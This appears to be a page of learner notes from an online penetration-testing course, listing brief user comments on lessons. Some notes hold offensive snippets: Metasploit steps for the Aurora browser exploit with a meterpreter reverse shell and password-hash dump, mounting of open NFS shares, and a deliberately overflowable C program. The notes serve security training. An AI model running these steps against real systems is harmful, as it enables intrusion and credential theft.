Advanced Penetration Testing Notes

Linux Part 5

netstat -antp    Checks local system for listening ports.   [view]

By: gamerb | Related Lesson: Linux (part 5) IP Addressing and netcat | Modified: February 4, 2017

hmm

oh my god… [view]

By: Pop3y3 | Related Lesson: Advanced Exploitation (part 5) Bypassing Antivirus Software | Modified: February 3, 2017

bash scripting-2

loops:                                                                   for x in seq 1 254 ; do                                    ping -c $1.$x   | grep ”64 bytes”             [view]

By: laymanbrother | Related Lesson: Programming (part 3) Network Pings | Modified: February 3, 2017

scripting in kali lnux

 nano ping.sh will create bash script of name ping.sh. script will be start from #!/bin/bash In ./ping.sh , . represents current directory. if we don’t have permission then we have to give command chmod 700 ping.sh. then we can execute the f [view]

By: laymanbrother | Related Lesson: Programming (part 2) Bash Scripting and If/Then Command | Modified: February 3, 2017

again !...

at 13’16: the url should be 127.0.1.1!!! (not 127.0.0.1) you may read the messages you have… training not prepared… happily we can try and test by ourself. Much more interesting to learn by ourself finally… [view]

By: Pop3y3 | Related Lesson: Advanced Exploitation (part 4) Social Engineering | Modified: February 3, 2017

a refaire

note perso : revenir dessus et refaire [view]

By: Pop3y3 | Related Lesson: Advanced Exploitation (part 3) Exploiting Java | Modified: February 2, 2017

Good here (even if Windows XP....)

use exploit/windows/browser/ms10_002_aurora show options set urlpath class show payloads set payload windows.meterpreter/reverse_tcp set lhost dddddddd exploit jobs session -i xx hashdump [view]

By: Pop3y3 | Related Lesson: Advanced Exploitation (part 2) Client Side Attacks | Modified: February 2, 2017

how to pretend having a 15 hours training? easy : don't prepare the training so that your hesitations take half of the time...

Nothing to add…. the lesson is NOT 12 minutes long… probably only 6 if you remove the part linked to unprepared training session. it does not help Cybrary as the global vision we have is that those training are not pro… even if the [view]

By: Pop3y3 | Related Lesson: Passwords (part 1) Password Attacks | Modified: February 2, 2017

could debug before making a video...

showmount pas connu sous KALI… showmount -e IP_adress ramene des repertoires ouverts mkdir /tmp/popeye mount -t nfs -o nolock IP_adress:chemin_des_repertoires_ouverts /tmp/popeye et si OK cd /tmp/popeye ls [view]

By: Pop3y3 | Related Lesson: Exploitation (part 6) Attaching to an IP Address | Modified: February 2, 2017

Exploit Development (part 6) Executing Unintended - source

/* Compile: gcc -g -fno-stack-protector -o to_exploit.bin to_exploit.c */#include <string.h>#include <stdio.h> void overflowed() {    printf(”%s”, ”Execution Hijacked\n”);        } void function(char *str) [view]

By: 4nzu | Related Lesson: Exploit Development (part 6) Executing Unintended Code | Modified: February 1, 2017

« First ‹ Previous 1 81 171 179 180 181 182 183 191 243 Next › Last »

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel